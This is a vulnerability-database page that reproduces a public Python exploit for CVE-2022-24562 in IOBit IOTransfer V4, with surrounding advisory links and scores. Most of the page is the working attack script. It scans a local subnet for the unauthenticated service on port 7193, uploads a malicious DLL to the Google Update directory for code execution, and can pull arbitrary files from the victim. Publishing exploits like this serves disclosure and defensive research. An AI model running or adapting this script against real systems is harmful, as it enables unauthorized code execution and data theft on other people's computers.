Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IOTransfer 4.0 - Remote Code Execution Exploit

🗓️ 21 Jul 2022 00:00:00Reported by Tomer PeledType 
zdt
 zdt🔗 0day.today👁 323 Views

IOTransfer V4 - Remote Code Execution (RCE) by Tomer Peled. Exploit allows unauthorized remote code execution on Windows 10. Affected versions V4 and onward. CVE-2022-24562. Exploit details on GitHub

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2022-24562
16 Jun 202219:15
attackerkb
CNNVD		IOBit IOTransfer 访问控制错误漏洞
16 Jun 202200:00
cnnvd
Check Point Advisories		IOBit IOTransfer Arbitrary File Write (CVE-2022-24562)
2 Aug 202200:00
checkpoint_advisories
CVE		CVE-2022-24562
16 Jun 202218:31
cve
Cvelist		CVE-2022-24562
16 Jun 202218:31
cvelist
NVD		CVE-2022-24562
16 Jun 202219:15
nvd
OSV		CVE-2022-24562
16 Jun 202219:15
osv
Packet Storm		IOTransfer 4.0 Remote Code Execution
21 Jul 202200:00
packetstorm
Prion		Remote code execution
16 Jun 202219:15
prion
Positive Technologies		PT-2022-16718 · Iobit · Iobit Iotransfer
16 Jun 202200:00
ptsecurity
Rows per page
# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)
# Exploit Author: Tomer Peled
# Vendor Homepage: https://www.iobit.com
# Software Link: https://iotransfer.itopvpn.com/
# Version: V4 and onward
# Tested on: Windows 10
# CVE : 2022-24562
# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562

import os
from urllib3.exceptions import ConnectTimeoutError
from win32com.client import *
import requests
import json

localPayloadPath = r"c:\temp\malicious.dll"
remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"
remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'
Range = "192.168.89"
UpOrDown="Upload"
IP = ""
UserName = ""

def get_version_number(file_path):
    information_parser = Dispatch("Scripting.FileSystemObject")
    version = information_parser.GetFileVersion(file_path)
    return version


def getTaskList(IP, taskid=""):
    print("Getting task list...")
    url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'
    res = requests.get(url)
    tasks = json.loads(res.content)
    tasks = json.loads(tasks['content'])
    for task in tasks['tasks']:
        if taskid == task['taskid']:
            print(f"Task ID found: {taskid}")


def CreateUploadTask(IP):
    SetSavePath(IP)
    url = f'http://{IP}:7193/index.php?action=createtask'
    task = {
        'method': 'get',
        'version': '1',
        'userid': '*',
        'taskstate': '0',
    }
    res = requests.post(url, json=task)
    task = json.loads(res.content)
    task = json.loads(task['content'])
    taskid = task['taskid']
    print(f"[*] TaskID: {taskid}")
    return taskid


def CreateUploadDetailNode(IP, taskid, remotePath, size='100'):
    url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'
    file_info = {
        'size': size,
        'savefilename': remotePath,
        'name': remotePath,
        'fullpath': r'c:\windows\system32\calc.exe',
        'md5': 'md5md5md5md5md5',
        'filetype': '3',
    }
    res = requests.post(url, json=file_info)
    js = json.loads(res.content)
    print(f"[V] Create Detail returned: {js['code']}")


def readFile(Path):
    file = open(Path, "rb")
    byte = file.read(1)
    next = "Start"
    while next != b'':
        byte = byte + file.read(1023)
        next = file.read(1)
        if next != b'':
            byte = byte + next
    file.close()
    return byte


def CallUpload(IP, taskid, localPayloadPath):
    url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'
    send_data = readFile(localPayloadPath)
    try:
        res = requests.post(url, data=send_data)
        js = json.loads(res.content)
        if js['code'] == 200:
            print("[V] Success payload uploaded!")
        else:
            print(f"CreateRemoteFile: {res.content}")
    except:
        print("[*] Reusing the task...")
        res = requests.post(url, data=send_data)
        js = json.loads(res.content)
        if js['code'] == 200 or "false" in js['error']:
            print("[V] Success payload uploaded!")
        else:
            print(f"[X] CreateRemoteFile Failed: {res.content}")


def SetSavePath(IP):
    url = f'http://{IP}:7193/index.php?action=setiotconfig'
    config = {
        'tasksavepath': 'C:\\Program '
    }
    requests.post(url, json=config)

def ExploitUpload(IP,payloadPath,rPath,taskid =None):
    if not taskid:
        taskid = CreateUploadTask(IP)
        size = os.path.getsize(payloadPath)
    CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))
    CallUpload(IP, taskid, payloadPath)


def CreateDownloadTask(IP, Path) -> str:
    url = f'http://{IP}:7193/index.php?action=createtask'
    task = {
        'method': 'get',
        'version': '1',
        'userid': '*',
        'taskstate': '0',
        'filepath': Path
    }
    res = requests.post(url, json=task)
    task = json.loads(res.content)
    task = json.loads(task['content'])
    taskid = task['taskid']
    print(f"TaskID: {taskid}")
    return taskid


def ExploitDownload(IP, DownloadPath, ID=None):
    if ID:
        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'
    else:
        taskid = CreateDownloadTask(IP, DownloadPath)
        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'
    res = requests.get(url)
    return res

def ScanIP(startRange):
    print("[*] Searching for vulnerable IPs", end='')
    Current = 142
    IP = f"{startRange}.{Current}"
    VulnerableIP: str = ""
    UserName: str = ""
    while Current < 252:
        print(".", end='')
        url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'
        try:
            res = requests.get(url, timeout=1)
            js = json.loads(res.content)
            js2 = json.loads(js['content'])
            UserName = js2['name']
            VulnerableIP=IP
            print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")
            print(f"[!] Vulnerable PC username: {UserName}")
            return VulnerableIP,UserName
        except Exception as e:
            pass
        except ConnectTimeoutError:
            pass
        IP = f"{startRange}.{Current}"
        Current = Current + 1
    return None,None


if __name__ == '__main__':
    IP,UserName = ScanIP(Range)
    if IP is None or UserName is None:
        print("[X] No vulnerable IP found")
        exit()
    print("[*] Starting Exploit...")
    if UpOrDown == "Upload":
        print(f"[*]Local Payload Path: {localPayloadPath}")
        print(f"[*]Remote Upload Path: {remotePayloadPath}")
        ExploitUpload(IP,localPayloadPath,remotePayloadPath)
    elif UpOrDown == "Download":
        print(f"[*] Downloading the file: {remoteDownloadPath}")
        res = ExploitDownload(IP, remoteDownloadPath)
        file = open("out.pdf", "wb+")
        file.write(res.content)
        file.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jul 2022 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 210
CVSS 3.19.8
EPSS0.49159
iotransfer v4remote code executiontomer peledwindows 10cve-2022-24562exploitgithub
323